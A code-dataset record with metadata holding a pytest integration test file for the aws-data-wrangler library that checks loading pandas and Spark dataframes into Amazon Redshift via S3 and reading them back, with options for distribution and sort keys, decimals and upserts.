Every record in this dump shares the same schema (column name and dtype):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
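As a rough illustration of how rows with this schema might be inspected (a sketch only: the file name code_rows.parquet is hypothetical, and only the column names are taken from the schema above):

import pandas as pd

# Hypothetical local export of the dataset; only the column names are real.
rows = pd.read_parquet("code_rows.parquet")

# Keep Python files that parse (cate_ast == 1) and are not flagged auto-generated.
mask = (
    (rows["lang"] == "Python")
    & (rows["qsc_codepython_cate_ast_quality_signal"] == 1)
    & (rows["qsc_code_cate_autogen_quality_signal"] == 0)
)
print(rows.loc[mask, ["max_stars_repo_name", "max_stars_repo_path", "size"]].head())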
Record 1: testing/test_awswrangler/test_redshift.py

| field | value |
|---|---|
| hexsha | 8670e8bdc3947086e3b13d63bfe6e79202643355 |
| size | 29,702 |
| ext | py |
| lang | Python |

| | repo_path | repo_name | repo_head_hexsha | repo_licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | testing/test_awswrangler/test_redshift.py | asafepy/aws-data-wrangler | 5cc6360eb8325fa79fc9abe3128ba7a5f40681fa | ["Apache-2.0"] | null | null | null |
| max_issues | testing/test_awswrangler/test_redshift.py | asafepy/aws-data-wrangler | 5cc6360eb8325fa79fc9abe3128ba7a5f40681fa | ["Apache-2.0"] | null | null | null |
| max_forks | testing/test_awswrangler/test_redshift.py | asafepy/aws-data-wrangler | 5cc6360eb8325fa79fc9abe3128ba7a5f40681fa | ["Apache-2.0"] | null | null | null |

content:
import json
import logging
from datetime import date, datetime
from decimal import Decimal
import pytest
import boto3
import pandas as pd
from pyspark.sql import SparkSession
import pg8000
import awswrangler as wr
from awswrangler import Session, Redshift
from awswrangler.exceptions import InvalidRedshiftDiststyle, InvalidRedshiftDistkey, InvalidRedshiftSortstyle, InvalidRedshiftSortkey
logging.basicConfig(level=logging.INFO, format="[%(asctime)s][%(levelname)s][%(name)s][%(funcName)s] %(message)s")
logging.getLogger("awswrangler").setLevel(logging.DEBUG)
@pytest.fixture(scope="module")
def cloudformation_outputs():
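    """Fetch the outputs of the aws-data-wrangler-test CloudFormation stack (deployed via SAM)."""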
response = boto3.client("cloudformation").describe_stacks(StackName="aws-data-wrangler-test")
outputs = {}
for output in response.get("Stacks")[0].get("Outputs"):
outputs[output.get("OutputKey")] = output.get("OutputValue")
yield outputs
@pytest.fixture(scope="module")
def session():
yield Session(spark_session=SparkSession.builder.appName("AWS Wrangler Test").getOrCreate())
@pytest.fixture(scope="module")
def bucket(session, cloudformation_outputs):
if "BucketName" in cloudformation_outputs:
bucket = cloudformation_outputs.get("BucketName")
session.s3.delete_objects(path=f"s3://{bucket}/")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
yield bucket
session.s3.delete_objects(path=f"s3://{bucket}/")
@pytest.fixture(scope="module")
def redshift_parameters(cloudformation_outputs):
redshift_parameters = {}
if "RedshiftAddress" in cloudformation_outputs:
redshift_parameters["RedshiftAddress"] = cloudformation_outputs.get("RedshiftAddress")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
if "Password" in cloudformation_outputs:
redshift_parameters["Password"] = cloudformation_outputs.get("Password")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
if "RedshiftPort" in cloudformation_outputs:
redshift_parameters["RedshiftPort"] = cloudformation_outputs.get("RedshiftPort")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
if "RedshiftRole" in cloudformation_outputs:
redshift_parameters["RedshiftRole"] = cloudformation_outputs.get("RedshiftRole")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
yield redshift_parameters
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,sortstyle,sortkey",
[
("micro", "overwrite", 1, "AUTO", "name", None, ["id"]),
("micro", "append", 2, None, None, "INTERLEAVED", ["id", "value"]),
("small", "overwrite", 1, "KEY", "name", "INTERLEAVED", ["id", "name"]),
("small", "append", 2, None, None, "INTERLEAVED", ["id", "name", "date"]),
("nano", "overwrite", 1, "ALL", None, "compound", ["id", "name", "date"]),
("nano", "append", 2, "ALL", "name", "INTERLEAVED", ["id"]),
],
)
def test_to_redshift_pandas(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle, distkey,
sortstyle, sortkey):
if sample_name == "micro":
dates = ["date"]
if sample_name == "small":
dates = ["date"]
if sample_name == "nano":
dates = ["date", "time"]
dataframe = pd.read_csv(f"data_samples/{sample_name}.csv", parse_dates=dates, infer_datetime_format=True)
dataframe["date"] = dataframe["date"].dt.date
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load/"
session.pandas.to_redshift(
dataframe=dataframe,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
preserve_index=True,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
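    # factor == 2 for "append" runs, which load the same rows twice;
    # preserve_index=True adds one extra column on the Redshift side.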
assert len(dataframe.index) * factor == len(rows)
assert len(list(dataframe.columns)) + 1 == len(list(rows[0]))
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,sortstyle,sortkey",
[
("micro", "overwrite", 1, "AUTO", "name", None, ["id"]),
("micro", "append", 2, None, None, "INTERLEAVED", ["id", "value"]),
("small", "overwrite", 1, "KEY", "name", "INTERLEAVED", ["id", "name"]),
("small", "append", 2, None, None, "INTERLEAVED", ["id", "name", "date"]),
("nano", "overwrite", 1, "ALL", None, "compound", ["id", "name", "date"]),
("nano", "append", 2, "ALL", "name", "INTERLEAVED", ["id"]),
],
)
def test_to_redshift_pandas_glue(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle, distkey,
sortstyle, sortkey):
if sample_name == "micro":
dates = ["date"]
if sample_name == "small":
dates = ["date"]
if sample_name == "nano":
dates = ["date", "time"]
dataframe = pd.read_csv(f"data_samples/{sample_name}.csv", parse_dates=dates, infer_datetime_format=True)
dataframe["date"] = dataframe["date"].dt.date
path = f"s3://{bucket}/redshift-load/"
session.pandas.to_redshift(
dataframe=dataframe,
path=path,
schema="public",
table="test",
connection="aws-data-wrangler-redshift",
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
preserve_index=True,
)
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert len(dataframe.index) * factor == len(rows)
assert len(list(dataframe.columns)) + 1 == len(list(rows[0]))
def test_to_redshift_pandas_cast(session, bucket, redshift_parameters):
df = pd.DataFrame({
"id": [1, 2, 3],
"name": ["name1", "name2", "name3"],
"foo": [None, None, None],
"boo": [date(2020, 1, 1), None, None],
"bar": [datetime(2021, 1, 1), None, None]
})
schema = {"id": "BIGINT", "name": "VARCHAR", "foo": "REAL", "boo": "DATE", "bar": "TIMESTAMP"}
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load/"
session.pandas.to_redshift(dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=False,
cast_columns=schema)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert len(df.index) == len(rows)
assert len(list(df.columns)) == len(list(rows[0]))
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,exc,sortstyle,sortkey",
[
("micro", "overwrite", 1, "FOO", "name", InvalidRedshiftDiststyle, None, None),
("micro", "overwrite", 2, "KEY", "FOO", InvalidRedshiftDistkey, None, None),
("small", "overwrite", 1, "KEY", None, InvalidRedshiftDistkey, None, None),
("small", "overwrite", 1, None, None, InvalidRedshiftSortkey, None, ["foo"]),
("small", "overwrite", 1, None, None, InvalidRedshiftSortstyle, "foo", ["id"]),
],
)
def test_to_redshift_pandas_exceptions(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle,
distkey, sortstyle, sortkey, exc):
dataframe = pd.read_csv(f"data_samples/{sample_name}.csv")
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load/"
with pytest.raises(exc):
assert session.pandas.to_redshift(
dataframe=dataframe,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
preserve_index=False,
)
con.close()
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,sortstyle,sortkey",
[
("micro", "overwrite", 1, "AUTO", "name", None, ["id"]),
("micro", "append", 2, None, None, "INTERLEAVED", ["id", "value"]),
("small", "overwrite", 1, "KEY", "name", "INTERLEAVED", ["id", "name"]),
("small", "append", 2, None, None, "INTERLEAVED", ["id", "name", "date"]),
("nano", "overwrite", 1, "ALL", None, "compound", ["id", "name", "date"]),
("nano", "append", 2, "ALL", "name", "INTERLEAVED", ["id"]),
],
)
def test_to_redshift_spark(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle, distkey,
sortstyle, sortkey):
path = f"data_samples/{sample_name}.csv"
if sample_name == "micro":
schema = "id SMALLINT, name STRING, value FLOAT, date DATE"
timestamp_format = "yyyy-MM-dd"
elif sample_name == "small":
schema = "id BIGINT, name STRING, date DATE"
timestamp_format = "dd-MM-yy"
elif sample_name == "nano":
schema = "id INTEGER, name STRING, value DOUBLE, date DATE, time TIMESTAMP"
timestamp_format = "yyyy-MM-dd"
dataframe = session.spark.read_csv(path=path,
schema=schema,
timestampFormat=timestamp_format,
dateFormat=timestamp_format,
header=True)
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load/",
connection=con,
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
min_num_partitions=2,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert (dataframe.count() * factor) == len(rows)
assert len(list(dataframe.columns)) == len(list(rows[0]))
def test_to_redshift_spark_big(session, bucket, redshift_parameters):
dataframe = session.spark_session.createDataFrame(
pd.DataFrame({
"A": list(range(100_000)),
"B": list(range(100_000)),
"C": list(range(100_000))
}))
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load/",
connection=con,
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
min_num_partitions=10,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert dataframe.count() == len(rows)
assert len(list(dataframe.columns)) == len(list(rows[0]))
def test_to_redshift_spark_bool(session, bucket, redshift_parameters):
dataframe = session.spark_session.createDataFrame(pd.DataFrame({"A": [1, 2, 3], "B": [True, False, True]}))
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load-bool/",
connection="aws-data-wrangler-redshift",
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
min_num_partitions=1,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert dataframe.count() == len(rows)
assert len(list(dataframe.columns)) == len(list(rows[0]))
assert type(rows[0][0]) == int
assert type(rows[0][1]) == bool
def test_stress_to_redshift_spark_big(session, bucket, redshift_parameters):
print("Creating DataFrame...")
dataframe = session.spark_session.createDataFrame(pd.DataFrame({
"A": list(range(10_000)),
"B": list(range(10_000))
}))
dataframe.cache()
for i in range(10):
print(f"Run number: {i}")
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load-{i}/",
connection=con,
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
min_num_partitions=16,
)
con.close()
dataframe.unpersist()
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,exc,sortstyle,sortkey",
[
("micro", "overwrite", 1, "FOO", "name", InvalidRedshiftDiststyle, None, None),
("micro", "overwrite", 2, "KEY", "FOO", InvalidRedshiftDistkey, None, None),
("small", "overwrite", 1, "KEY", None, InvalidRedshiftDistkey, None, None),
("small", "overwrite", 1, None, None, InvalidRedshiftSortkey, None, ["foo"]),
("small", "overwrite", 1, None, None, InvalidRedshiftSortstyle, "foo", ["id"]),
],
)
def test_to_redshift_spark_exceptions(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle,
distkey, sortstyle, sortkey, exc):
path = f"data_samples/{sample_name}.csv"
dataframe = session.spark.read_csv(path=path)
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
with pytest.raises(exc):
assert session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load/",
connection=con,
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
min_num_partitions=2,
)
con.close()
def test_write_load_manifest(session, bucket):
boto3.client("s3").upload_file("data_samples/small.csv", bucket, "data_samples/small.csv")
object_path = f"s3://{bucket}/data_samples/small.csv"
manifest_path = f"s3://{bucket}/manifest.json"
session.redshift.write_load_manifest(manifest_path=manifest_path, objects_paths=[object_path])
manifest_json = (boto3.client("s3").get_object(Bucket=bucket, Key="manifest.json").get("Body").read())
manifest = json.loads(manifest_json)
assert manifest.get("entries")[0].get("url") == object_path
assert manifest.get("entries")[0].get("mandatory")
assert manifest.get("entries")[0].get("meta").get("content_length") == 2247
def test_connection_timeout(redshift_parameters):
with pytest.raises(pg8000.core.InterfaceError):
Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=12345,
user="test",
password=redshift_parameters.get("Password"),
)
def test_connection_with_different_port_types(redshift_parameters):
conn = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=str(redshift_parameters.get("RedshiftPort")),
user="test",
password=redshift_parameters.get("Password"),
)
conn.close()
conn = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=float(redshift_parameters.get("RedshiftPort")),
user="test",
password=redshift_parameters.get("Password"),
)
conn.close()
def test_to_redshift_pandas_decimal(session, bucket, redshift_parameters):
df = pd.DataFrame({
"id": [1, 2, 3],
"decimal_2": [Decimal((0, (1, 9, 9), -2)), None, Decimal((0, (1, 9, 0), -2))],
"decimal_5": [Decimal((0, (1, 9, 9, 9, 9, 9), -5)), None,
Decimal((0, (1, 9, 0, 0, 0, 0), -5))],
})
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=False,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert len(df.index) == len(rows)
assert len(list(df.columns)) == len(list(rows[0]))
for row in rows:
if row[0] == 1:
assert row[1] == Decimal((0, (1, 9, 9), -2))
assert row[2] == Decimal((0, (1, 9, 9, 9, 9, 9), -5))
        elif row[0] == 2:
assert row[1] is None
assert row[2] is None
        elif row[0] == 3:
assert row[1] == Decimal((0, (1, 9, 0), -2))
assert row[2] == Decimal((0, (1, 9, 0, 0, 0, 0), -5))
def test_to_redshift_spark_decimal(session, bucket, redshift_parameters):
df = session.spark_session.createDataFrame(pd.DataFrame({
"id": [1, 2, 3],
"decimal_2": [Decimal((0, (1, 9, 9), -2)), None, Decimal((0, (1, 9, 0), -2))],
"decimal_5": [Decimal((0, (1, 9, 9, 9, 9, 9), -5)), None,
Decimal((0, (1, 9, 0, 0, 0, 0), -5))]
}),
schema="id INTEGER, decimal_2 DECIMAL(3,2), decimal_5 DECIMAL(6,5)")
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load2/"
session.spark.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test2",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test2")
rows = cursor.fetchall()
cursor.close()
con.close()
assert df.count() == len(rows)
assert len(list(df.columns)) == len(list(rows[0]))
for row in rows:
if row[0] == 1:
assert row[1] == Decimal((0, (1, 9, 9), -2))
assert row[2] == Decimal((0, (1, 9, 9, 9, 9, 9), -5))
        elif row[0] == 2:
assert row[1] is None
assert row[2] is None
        elif row[0] == 3:
assert row[1] == Decimal((0, (1, 9, 0), -2))
assert row[2] == Decimal((0, (1, 9, 0, 0, 0, 0), -5))
def test_to_parquet(session, bucket, redshift_parameters):
n: int = 1_000_000
df = pd.DataFrame({"id": list((range(n))), "name": list(["foo" if i % 2 == 0 else "boo" for i in range(n)])})
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/test_to_parquet/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
)
path = f"s3://{bucket}/test_to_parquet2/"
paths = session.redshift.to_parquet(sql="SELECT * FROM public.test",
path=path,
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
partition_cols=["name"])
assert len(paths) == 4
@pytest.mark.parametrize("sample_name", ["micro", "small", "nano"])
def test_read_sql_redshift_pandas(session, bucket, redshift_parameters, sample_name):
if sample_name == "micro":
dates = ["date"]
elif sample_name == "small":
dates = ["date"]
else:
dates = ["date", "time"]
df = pd.read_csv(f"data_samples/{sample_name}.csv", parse_dates=dates, infer_datetime_format=True)
df["date"] = df["date"].dt.date
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/test_read_sql_redshift_pandas/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
)
path2 = f"s3://{bucket}/test_read_sql_redshift_pandas2/"
df2 = session.pandas.read_sql_redshift(sql="select * from public.test",
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
temp_s3_path=path2)
assert len(df.index) == len(df2.index)
assert len(df.columns) + 1 == len(df2.columns)
def test_read_sql_redshift_pandas2(session, bucket, redshift_parameters):
n: int = 1_000_000
df = pd.DataFrame({"id": list((range(n))), "val": list(["foo" if i % 2 == 0 else "boo" for i in range(n)])})
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/test_read_sql_redshift_pandas2/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
)
path2 = f"s3://{bucket}/test_read_sql_redshift_pandas22/"
df2 = session.pandas.read_sql_redshift(sql="select * from public.test",
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
temp_s3_path=path2)
wr.s3.delete_objects(path=f"s3://{bucket}/")
assert len(df.index) == len(df2.index)
assert len(df.columns) + 1 == len(df2.columns)
def test_to_redshift_pandas_upsert(session, bucket, redshift_parameters):
wr.s3.delete_objects(path=f"s3://{bucket}/")
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
df = pd.DataFrame({"id": list((range(1_000))), "val": list(["foo" if i % 2 == 0 else "boo" for i in range(1_000)])})
df3 = pd.DataFrame({
"id": list((range(1_000, 1_500))),
"val": list(["foo" if i % 2 == 0 else "boo" for i in range(500)])
})
for i in range(10):
print(f"run: {i}")
# CREATE
path = f"s3://{bucket}/test_to_redshift_pandas_upsert/"
session.pandas.to_redshift(dataframe=df,
path=path,
schema="public",
table="test_upsert",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
primary_keys=["id"])
path = f"s3://{bucket}/test_to_redshift_pandas_upsert2/"
df2 = session.pandas.read_sql_redshift(sql="select * from public.test_upsert",
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
temp_s3_path=path)
assert len(df.index) == len(df2.index)
assert len(df.columns) + 1 == len(df2.columns)
# UPSERT
path = f"s3://{bucket}/test_to_redshift_pandas_upsert3/"
session.pandas.to_redshift(dataframe=df3,
path=path,
schema="public",
table="test_upsert",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="upsert",
preserve_index=True,
primary_keys=["id"])
path = f"s3://{bucket}/test_to_redshift_pandas_upsert4/"
df4 = session.pandas.read_sql_redshift(sql="select * from public.test_upsert",
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
temp_s3_path=path)
assert len(df.index) + len(df3.index) == len(df4.index)
        assert len(df.columns) + 1 == len(df4.columns)
wr.s3.delete_objects(path=f"s3://{bucket}/")
con.close()
@pytest.mark.parametrize("sample_name", ["micro", "small", "nano"])
def test_read_sql_redshift_pandas_glue_conn(session, bucket, redshift_parameters, sample_name):
if sample_name == "micro":
dates = ["date"]
elif sample_name == "small":
dates = ["date"]
else:
dates = ["date", "time"]
df = pd.read_csv(f"data_samples/{sample_name}.csv", parse_dates=dates, infer_datetime_format=True)
df["date"] = df["date"].dt.date
path = f"s3://{bucket}/test_read_sql_redshift_pandas_glue_conn/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection="aws-data-wrangler-redshift",
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
)
path2 = f"s3://{bucket}/test_read_sql_redshift_pandas_glue_conn2/"
df2 = session.pandas.read_sql_redshift(sql="select * from public.test",
iam_role=redshift_parameters.get("RedshiftRole"),
connection="aws-data-wrangler-redshift",
temp_s3_path=path2)
assert len(df.index) == len(df2.index)
assert len(df.columns) + 1 == len(df2.columns)
The remaining fields of this row:

| field | value |
|---|---|
| avg_line_length | 39.340397 |
| max_line_length | 133 |
| alphanum_fraction | 0.588311 |
| effective | 0 |
| hits | 7 |

Each qsc_*_quality_signal value is paired below with its bare qsc_* flag column:

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 3,216 | 0 |
| qsc_code_num_chars | 29,702 | 0 |
| qsc_code_mean_word_length | 5.291978 | 0 |
| qsc_code_frac_words_unique | 0.080535 | null |
| qsc_code_frac_chars_top_2grams | 0.106822 | 0 |
| qsc_code_frac_chars_top_3grams | 0.093778 | 0 |
| qsc_code_frac_chars_top_4grams | 0.020624 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.846818 | 1 |
